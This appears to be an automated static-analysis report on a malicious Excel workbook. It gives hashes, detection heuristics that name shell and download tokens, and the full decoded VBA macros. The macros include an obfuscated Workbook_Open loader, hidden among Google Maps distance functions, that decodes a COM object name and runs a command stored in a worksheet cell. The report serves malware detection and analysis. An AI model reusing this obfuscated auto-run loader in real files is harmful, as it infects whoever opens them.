Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 aefe0add7986c245…

MALICIOUS

Office (OLE) / .XLS

66.0 KB Created: 2019-02-11 19:07:25 Authoring application: Microsoft Excel First seen: 2026-06-22
MD5: 9e4c12343c116993d6ecf9530d2c5dd6 SHA-1: 82ca29932f9bcf2f62ad32d6129dfa1f63f8a856 SHA-256: aefe0add7986c2455e6c35d5c935936d724b2734de9ac1644948315bea7b401e
330 Risk Score

Heuristics 10

  • Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • ClamAV: Xls.Malware.Valyria-9756472-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-9756472-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
  • Payload URL assembled from a Chr()/Asc() string expression (1 URL) high OLE_VBA_EXPR_DROPPER_URL
    A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://maps.googleapis.com/maps/api/distancematrix/json?origins= Referenced by macro
    • http://maps.googleapis.com/maps/api/distancematrix/json?origins=&destinations=&mode=car&language=en&sensor=false&key=YOUR_KEYReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 229 bytes
SHA-256: ac3fe6720250bf67d6d766cbfeb5a3936d2b9ab2973d09a5f12b2b83bd7cb12f
Preview script
First 1,000 lines of the extracted script
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  LNNE
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9989 bytes
SHA-256: 788f44f84bf7989b65d8a478eb1683053d1bbdc30104423e3802c8b3aa6797fb
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public w5ec393ebb As Object
Public Function GetDuration(start As String, dest As String)
    Dim firstVal As String, secondVal As String, lastVal As String
    firstVal = "http://maps.googleapis.com/maps/api/distancematrix/json?origins="
    secondVal = "&destinations="
    lastVal = "&mode=car&language=en&sensor=false&key=YOUR_KEY"
    Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
    URL = firstVal & Replace(start, " ", "+") & secondVal & Replace(dest, " ", "+") & lastVal
    objHTTP.Open "GET", URL, False
    objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    objHTTP.send ("")
    If InStr(objHTTP.responseText, """duration"" : {") = 0 Then GoTo ErrorHandl
    Set regex = CreateObject("VBScript.RegExp"): regex.Pattern = "duration(?:.|\n)*?""value"".*?([0-9]+)": regex.Global = False
    Set matches = regex.Execute(objHTTP.responseText)
    tmpVal = Replace(matches(0).SubMatches(0), ".", Application.International(xlListSeparator))
    GetDuration = CDbl(tmpVal)
    Exit Function
ErrorHandl:
    GetDuration = -1
End Function
Public Function GetDistanceCoord(ByVal lat1 As Double, ByVal lon1 As Double, ByVal lat2 As Double, ByVal lon2 As Double, ByVal unit As String) As Double
    Dim theta As Double: theta = lon1 - lon2
    Dim dist As Double: dist = Math.Sin(deg2rad(lat1)) * Math.Sin(deg2rad(lat2)) + Math.Cos(deg2rad(lat1)) * Math.Cos(deg2rad(lat2)) * Math.Cos(deg2rad(theta))
    dist = WorksheetFunction.Acos(dist)
    dist = rad2deg(dist)
    dist = dist * 60 * 1.1515
    If unit = "K" Then
        dist = dist * 1.609344
    ElseIf unit = "N" Then
        dist = dist * 0.8684
    End If
    GetDistanceCoord = dist
End Function
 
Function deg2rad(ByVal deg As Double) As Double
    deg2rad = (deg * WorksheetFunction.Pi / 180#)
End Function
 
Function rad2deg(ByVal rad As Double) As Double
    rad2deg = rad / WorksheetFunction.Pi * 180#
End Function
Sub Workbook_Open()
Set w5ec393ebb = CreateObject(x86e1e32188("716D7D8C838A8E486D827F8686"))
Dim fc964add29bc94 As Long: fc964add29bc94 = 5
Dim me15459e5 As String
Dim ze81e7d1de787a7 As Long
Select Case fc964add29bc94
Case 24 - (15 + 13) - 4 * Int(83 / 64 + 14) - Int(1607 / 3771) * 12
me15459e5 = "r2ab932f4824a2"
Case 16 + (216 - 336) + Int(20 + 4 - 13) + 6 / Int(23 + 4 / 4) / 27
me15459e5 = "ze836f7dc756e4c"
Case 13 - (10 + 27) - 21 / Int(11 + 28 / 15) / 23 / Int(21 + 10 / 16) / 9
me15459e5 = "n7981e382"
Case 27 + (336 - 348) + Int(12 + 23 - 6) + 5 / Int(19 + 11 / 22) / 10 * Int(98 / 69 + 13) - Int(3651 / 4454) * 20
me15459e5 = "y7fe4162948"
Case 19 / Int(10 + 16 / 17) / 24 + (252 - 324) + Int(19 + 14 - 11) + 18 - (23 + 23) - 7
me15459e5 = "neae7d"
Case 6 + (228 - 204) + Int(21 + 14 - 12) + 8 - (14 + 14) - 5 / Int(18 + 4 / 4) / 17
me15459e5 = "gc62fb7a3f45ab"
Case 13 - (22 + 4) - 17 / Int(27 + 18 / 21) / 6
me15459e5 = "q977dda7424865"
Case 8 / Int(7 + 21 / 26) / 17 + (348 - 312) + Int(17 + 29 - 16) + 8 + (156 - 168) + Int(5 + 9 - 6) + 11
me15459e5 = "z1e4445"
Case 26 + (324 - 324) + Int(22 + 11 - 26) + 21 * Int(12 / 91 + 17) - Int(1072 / 3265) * 10 - (25 + 16) - 17
me15459e5 = "jc6fcb"
Case 8 - (22 + 7) - 5 * Int(25 / 63 + 18) - Int(4898 / 1927) * 8
me15459e5 = "h71b1a29aa7fc96"
Case 18 - (26 + 18) - 21 * Int(25 / 65 + 19) - Int(1063 / 27) * 29
me15459e5 = "ff6ddf"
Case 29 * Int(52 / 56 + 15) - Int(3591 / 3756) * 18 / Int(14 + 29 / 10) / 9
me15459e5 = "kfb4751885"
Case 29 / Int(9 + 5 / 10) / 16 / Int(17 + 20 / 7) / 26 + (144 - 192) + Int(29 + 28 - 15) + 23
me15459e5 = "j615e651e47e"
Case 28 - (17 + 25) - 26 / Int(11 + 26 / 19) / 4 - (7 + 28) - 7
me15459e5 = "pd95af8b2"
Case 19 + (204 - 252) + Int(14 + 20 - 6) + 17 - (20 + 26) - 5
me15459e5 = "m5e15e"
Case 18 * Int(67 / 51 + 11) - Int(2917 / 2103) * 10 * Int(54 / 97 + 12) - Int(380 / 4880) * 8
me15459e5 = "r846fa6"
Case 28 + (240 - 84) + Int(9 + 23 - 4) + 22 + (264 - 336) + Int(15 + 16 - 19) + 8
me15459e5 = "l936b6"
Case 4 - (23 + 10) - 13 + (84 - 96) + Int(8 + 16 - 16) + 15 - (4 + 13) - 6
me15459e5 = "p3d355"
Case 18 / Int(13 + 5 / 19) / 21 - (23 + 27) - 15 - (28 + 16) - 7
me15459e5 = "z7dbe199fa"
Case 13 * Int(87 / 68 + 14) - Int(3610 / 1682) * 8 - (9 + 5) - 24
me15459e5 = "d1956adde91f"
Case 9 - (8 + 24) - 6 * Int(46 / 48 + 9) - Int(4746 / 85) * 25 / Int(15 + 26 / 10) / 13
me15459e5 = "j4146db48e"
Case 12 - (11 + 16) - 29 * Int(85 / 74 + 12) - Int(4746 / 4271) * 26 * Int(51 / 46 + 19) - Int(4901 / 2723) * 11
me15459e5 = "l3e5f1b4341f4"
Case 10 + (228 - 288) + Int(9 + 17 - 25) + 18 - (18 + 26) - 16 + (240 - 312) + Int(15 + 14 - 19) + 5
me15459e5 = "lcf218a28449e"
Case 7 - (4 + 13) - 28 + (156 - 216) + Int(4 + 7 - 23) + 14 * Int(18 / 67 + 13) - Int(4062 / 3480) * 8
me15459e5 = "f826c28"
Case 20 - (19 + 26) - 5 + (120 - 108) + Int(15 + 6 - 25) + 17
me15459e5 = "f2777775ae7d9"
Case 4 + (132 - 180) + Int(16 + 13 - 10) + 6 - (5 + 21) - 11
me15459e5 = "bb21fe44afb82"
Case 24 - (16 + 19) - 10 - (14 + 25) - 27 / Int(21 + 24 / 19) / 6
me15459e5 = "r4cb23"
Case 12 * Int(57 / 38 + 14) - Int(475 / 3084) * 5 + (204 - 336) + Int(24 + 17 - 11) + 15
me15459e5 = "k43ad5d4ecbebd"
Case 4 + (324 - 324) + Int(19 + 19 - 25) + 11 + (264 - 348) + Int(27 + 17 - 6) + 28
me15459e5 = "l5c44c12"
Case 10 * Int(77 / 37 + 14) - Int(1436 / 1850) * 28 - (14 + 12) - 15
me15459e5 = "ufc41c55f5729fc"
Case 4 + (264 - 324) + Int(17 + 22 - 25) + 7 + (84 - 228) + Int(14 + 21 - 18) + 6 / Int(4 + 17 / 4) / 29
me15459e5 = "pa5ca4ff5"
Case 11 + (300 - 348) + Int(21 + 10 - 25) + 9 / Int(26 + 16 / 28) / 23
me15459e5 = "j989d1b7b7"
Case 20 - (8 + 22) - 18 / Int(12 + 23 / 19) / 7
me15459e5 = "ncc2f81f8efa"
Case 11 + (240 - 312) + Int(20 + 29 - 7) + 13 - (14 + 26) - 25 * Int(69 / 38 + 17) - Int(4168 / 2340) * 27
me15459e5 = "ab5e5f96"
Case 19 / Int(28 + 21 / 28) / 21 / Int(18 + 19 / 8) / 14
me15459e5 = "x55711"
Case 19 - (22 + 22) - 26 * Int(33 / 44 + 17) - Int(365 / 2858) * 12
me15459e5 = "kbeeb6735"
Case 13 * Int(9 / 82 + 15) - Int(282 / 2904) * 14 * Int(47 / 53 + 11) - Int(2619 / 1030) * 13
me15459e5 = "s9a6ab986b57c"
Case 7 + (108 - 228) + Int(12 + 15 - 22) + 22 / Int(9 + 14 / 20) / 28
me15459e5 = "u55b2632993cb5"
Case 24 + (348 - 240) + Int(4 + 12 - 18) + 11 - (5 + 21) - 18 - (8 + 10) - 22
me15459e5 = "wec4a4a6ba"
Case 5:
y674b9d236cba3 ("we43fa6cdf35b12")
Case 21 / Int(12 + 18 / 17) / 28 / Int(13 + 4 / 8) / 13
me15459e5 = "p85f53931fa5a"
Case 9 / Int(26 + 20 / 11) / 16 * Int(11 / 54 + 10) - Int(4712 / 1356) * 13
me15459e5 = "xd9ad7"
Case 23 * Int(85 / 34 + 12) - Int(2207 / 4776) * 20 + (336 - 48) + Int(17 + 8 - 21) + 8 / Int(24 + 11 / 29) / 23
me15459e5 = "a9e72cbb"
Case 9 + (156 - 348) + Int(28 + 14 - 7) + 28 * Int(46 / 47 + 10) - Int(807 / 2735) * 6 + (168 - 84) + Int(20 + 17 - 8) + 16
me15459e5 = "z3b8a474e9c3e31"
Case 20 / Int(23 + 4 / 14) / 20 + (108 - 180) + Int(21 + 8 - 20) + 25
me15459e5 = "p591a68"
Case 18 / Int(25 + 19 / 12) / 9 * Int(81 / 33 + 15) - Int(4034 / 315) * 26
me15459e5 = "e19f2cf8132"
Case 24 + (252 - 228) + Int(29 + 19 - 11) + 8 * Int(37 / 30 + 17) - Int(1609 / 3410) * 14 + (312 - 180) + Int(4 + 6 - 19) + 23
me15459e5 = "mb81ff5d4291"
Case 19 + (96 - 216) + Int(15 + 16 - 25) + 8 - (28 + 11) - 12 - (6 + 18) - 22
me15459e5 = "xf1c57c5"
Case 23 - (15 + 21) - 13 / Int(18 + 19 / 27) / 7
me15459e5 = "x341bb3eb"
Case 4 + (72 - 312) + Int(17 + 28 - 8) + 20 * Int(93 / 68 + 18) - Int(2817 / 5995) * 5
me15459e5 = "u99b72"
Case 19 - (24 + 22) - 26 + (60 - 228) + Int(12 + 17 - 25) + 27
me15459e5 = "ab43a232d796"
Case 16 - (25 + 5) - 6 - (14 + 25) - 23 - (9 + 18) - 18
me15459e5 = "ue655e69d35e"
Case 23 / Int(8 + 12 / 9) / 23 / Int(18 + 12 / 15) / 25
me15459e5 = "kf9ee444"
Case 14 / Int(19 + 9 / 26) / 16 / Int(14 + 27 / 7) / 11 / Int(5 + 24 / 21) / 18
me15459e5 = "eafebb"
End Select
End Sub
Private Function y674b9d236cba3(ByVal v3ec2654d716422 As String) As String
w5ec393ebb.Run x86e1e32188(ThisWorkbook.Sheets("LNNES").Range("G135").Value), 0, True
End Function

Private Function x86e1e32188(ByVal v3ec2654d716422 As String)
Dim u43beba5815 As String: Dim jbad815c3 As Long
For jbad815c3 = 1 To Len(v3ec2654d716422) Step 2
u43beba5815 = u43beba5815 & Chr(Val(Chr(Int(0 + 4 + Int(10 / 8) - 13 + Int(6 / 8) + Int(13 / 5) + Int(9 / 5) + Int(11 / 2) - 10 + 48)) & Chr(Int(0 + Int(9 / 5) + Int(6 / 5) + 8 - 11 + 4 - 6 + 8 - 5 + 5 + 67)) & Right(Left(v3ec2654d716422, jbad815c3 + ((34 + 6 - 20) / 2 - 9)), (43 - 23 - 10 + 5 - 13))) - 26)
Next
x86e1e32188 = u43beba5815
End Function
Public Function GetDistance(start As String, dest As String)
    Dim firstVal As String, secondVal As String, lastVal As String
    firstVal = "http://maps.googleapis.com/maps/api/distancematrix/json?origins="
    secondVal = "&destinations="
    lastVal = "&mode=car&language=pl&sensor=false&key=YOUR_KEY"
    Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
    URL = firstVal & Replace(start, " ", "+") & secondVal & Replace(dest, " ", "+") & lastVal
    objHTTP.Open "GET", URL, False
    objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    objHTTP.send ("")
    If InStr(objHTTP.responseText, """distance"" : {") = 0 Then GoTo ErrorHandl
    Set regex = CreateObject("VBScript.RegExp"): regex.Pattern = """value"".*?([0-9]+)": regex.Global = False
    Set matches = regex.Execute(objHTTP.responseText)
    tmpVal = Replace(matches(0).SubMatches(0), ".", Application.International(xlListSeparator))
    GetDistance = CDbl(tmpVal)
    Exit Function
ErrorHandl:
    GetDistance = -1
End Function